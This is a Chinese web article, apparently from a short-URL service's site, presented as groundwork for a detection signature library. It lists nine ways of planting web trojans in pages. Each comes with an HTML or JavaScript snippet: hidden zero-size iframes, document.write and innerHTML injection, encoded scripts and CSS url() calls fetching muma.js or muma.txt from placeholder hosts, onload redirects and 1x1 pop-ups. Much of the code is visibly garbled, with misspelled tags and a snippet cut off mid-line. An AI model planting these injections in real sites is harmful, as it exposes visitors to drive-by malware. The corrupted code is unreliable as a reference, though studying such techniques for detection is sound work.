短網(wǎng)址網(wǎng)頁木馬常見9種掛馬技術(shù)

時間：2023-05-16 08:00:02 | 來源：網(wǎng)站運營

時間：2023-05-16 08:00:02 來源：網(wǎng)站運營

短網(wǎng)址網(wǎng)頁木馬常見9種掛馬技術(shù)：短網(wǎng)址網(wǎng)頁源碼的ＤＯＭ解析技術(shù)，在處理完爬取下來的短網(wǎng)址網(wǎng)頁源碼后，接下來要進行的是短網(wǎng)址源碼與短網(wǎng)址頁面木馬特征值的匹配。要完成匹配的工作，就需要建立短網(wǎng)址網(wǎng)頁木馬特征值的正則表達式庫，然后實現(xiàn)短網(wǎng)址網(wǎng)頁源碼與正則表達式的匹配。

短網(wǎng)址網(wǎng)頁木馬解析之常見掛馬方式

由于該技術(shù)是公司項目，主要為互聯(lián)網(wǎng)提供安全保護服務(wù)，因此在項目成立初就針對這些網(wǎng)站進行了詳細(xì)的調(diào)研，對此類站點遇到的掛馬方式進行了詳細(xì)的總結(jié)和整理，再結(jié)合目前互聯(lián)網(wǎng)上的主流掛馬方式，建立起短網(wǎng)址的木馬特征庫。根據(jù)前期調(diào)研總結(jié)了此類站點最常的掛馬方式．具體如下：

短網(wǎng)址木馬解析1、框架掛馬：

＜ｉｆｉａｉｎｅ ｓｒｃ ＝＂網(wǎng)頁木馬地址＂ｗｉｄｔｈ ＝ “0” ｈｅｉｇｈｔ ＝ “0”＞＜／ｉｆｒａｍｅ＞

ｉｆｒａｍｅ是普通的ＨＴＭＬ標(biāo)簽，主要用來在一個網(wǎng)頁界面中，劃分出左右或者上下的框架，侵入者利用ｉｆｏｍｅ的功能，在正常網(wǎng)頁中，寫入長寬為0的隱藏框架，讓用戶在不知不覺中就打開了木馬網(wǎng)站。

短網(wǎng)址木馬解析2、ＪＳ文件掛馬：

ＪＳ文件掛馬方法是，將指向木馬的代碼寫入文件，保存為ｘｘｘ．ｊｓ，然后通過寫入＜script ｌａｎｇｕａｇｅ＝ ＂ｊａｖａｓｃｒｉｐｔ＂ ｓｒｃ ＝ ＂ｘｘｘ．Ｊｓ”＞＜／ｓｃｒｉｐｔ＞來實現(xiàn)桂馬。指向木馬的代碼如下：

ｄｏｃｕｍeｔ.ｗｒｉｔｅ（＂＜ｉｆrａｍｅ ｗｉｄｔｈ ＝”0” ｈｅｉｇｈｔ ＝ ＂０＂ ｓｒｃ=’網(wǎng)頁木馬地址’>”)。

短網(wǎng)址木馬解析3、ＪＳ變形加密：

利用ｊｓｃｒｉｐｔ．ｅｎｃｏｄｅ加密，會使代碼更具隱蔽性，這里的掛馬網(wǎng)址的文件后綴是ｍｕｍａ.txt，除此之外，還可以引入其他擴展名的JS代碼。

＜ｓｃｒｉｐｔ ｌａｎｇｕａｇｅ =＂ｊｓｃｒｉｐｔ．Ｅｎｃｏｄｅ” ｓｒｃ ＝

＂ｈｔｔｐ：／／ｗｗｗ．ｘｘｘ．ｃｏｍ／ｍｕｍａ．tｘｔ”＞＜／ｓｃｒｉｐｔ＞

短網(wǎng)址木馬解析4、ｂｏｄｙ掛馬：

使用如下代碼，就可政使網(wǎng)頁在加載完成的時候跳轉(zhuǎn)到網(wǎng)頁木馬的網(wǎng)址

＜ｂｏｄｙ ｏｎｌｏａｄ =＂ｗｉｎｄｏｗ．ｌｏｃａｔｉｏｎ ＝’網(wǎng)頁木馬地址’;”><／ｂｏｄｙ〉。

短網(wǎng)址木馬解析5、ｃｓｓ掛馬：

在文擋的樣式表中使用ＵＲＬ函數(shù)引入木馬鏈接，具體格式如下：

ｂｏｄｙ ｛ ｂａｃｋｇｒｏｕｎｄ－ｉｍａｇｅ ： ｕｒｌ （‘ｊａｖａｓｃｒｉｐｔ：

ｄｏｃｕｍｅｎｔ．ｗｒｉｔｅ （＂＜ｓｃｒｉｐｔ ｓｒｃ

＝’ｈｔｔｐ：／／ｗｗｗ．ｘｘ．Ｎｅｔ/mｕｍａ．Ｊｓ’〉＜／ｓｃｒｉｐｔ＞”）’）}。

短網(wǎng)址木馬解析6、圖片掛碼：

這種掛馬方式利用圖片作為偽裝，用戶點擊圖片，一個看不見的窗口被激活運行，木馬也隨之被運行。掛馬代碼如下：

＜ｈｔｍｌ＞

＜ｉｆｒａｍｅ ｓｒｃ ＝’網(wǎng)頁木馬地址’ｈｅｉｇｈｔ ＝ ０ ｗｉｄｔｈ

＝ ０ ＞＜／ｉｆｒａｍｅ＞

＜Ｌｍｇ ｓｒｃ =‘圖片地址’＞＜／ｃｅｎｔｅｒ＞

＜／ｈｔｍｌ＞

短網(wǎng)址木馬解析7、利用隱藏的分割框架引入網(wǎng)頁木馬：示例代碼如下：

＜ｆrａｍｅｓｅｔ ｒｏｗ = ‘‘４４４，０”ｃｏｌｓ ＝ ＂＊”＞

＜ｆｒａｍｅ ｓｒｃ ＝”打開網(wǎng)頁”ｆｒａｍｂｏｒｄｅｒ ＝ ＂ｎｏ＂ ｓｃｒｏｌｌｉｎｇ

=”auto＂ｎｏresｉｚｅ ｍａｒｇｉｎｗｉｄth＝‘”０”ｍａｒｇｉｎｈｅｉｇｈｔ＝＂０”＞

＜fiａmｅ ｓｒｃ=＂網(wǎng)巧木馬地址＂ｆｒａｍｂｏｒｄｅｒ ＝ ＂ｎｏ＂ ｓｃｒｏｌｌｉｎｇ

＝ ＂ａｕｔｏ＂ ｎｏｒｅｓｉｚｅ ｍａrginwｉｄｔｈ＝”0”ｍａrｇｉｎｈｅｉｇｈｔ ＝ ＂０’’＞

＜／ｆｒａｍｅｓｅｔ＞

短網(wǎng)址木馬解析8、Ｊａｖａ 掛馬：

＜ｓｃｒｉｐｔ ｌａｎｇｕａｇｅ=”ｊａｖａｓｃｒｉｐｔ”＞

ｗｉｎｄｏｗ．Ｏｐｅｎ(“ 網(wǎng)頁木馬地址＂,””,”ｔｏｏｌｂａｒ = ｎｏ， ｌｏｃａｔｉｏｎ＝ｎｏ，

ｄｉｒｅｃｔｏｒｉｅｓ＝ ｎｏ， ｓｔａｔｕｓ＝ｎｏ， ｍｅｎｕｂａｒ ＝ ｎｏ，

ｓｃｒｏｌlbarｓ=ｎｏ， ｗｉｄｔｈ＝ １， ｈｅｉｇｈｔ ＝ １”）；

短網(wǎng)址木馬解析9、隱蔽掛馬：

ｔｏｐ．ｄｏｃｕｍｅｎｔｂｏｄｙ．ｉｎｎｅｒＨＴＭＬ ＝ ｔｏｐ．ｄｏｃｕｍｅｎｔｂｏｄｙ．

ｉnnｅｒＨＴＭＬ ＋ ＇＼ｒ＼ｎ＜ｉｆｒａｍｅ ｓｒｃ ＝”;

原文來自：短網(wǎng)址 http:980.so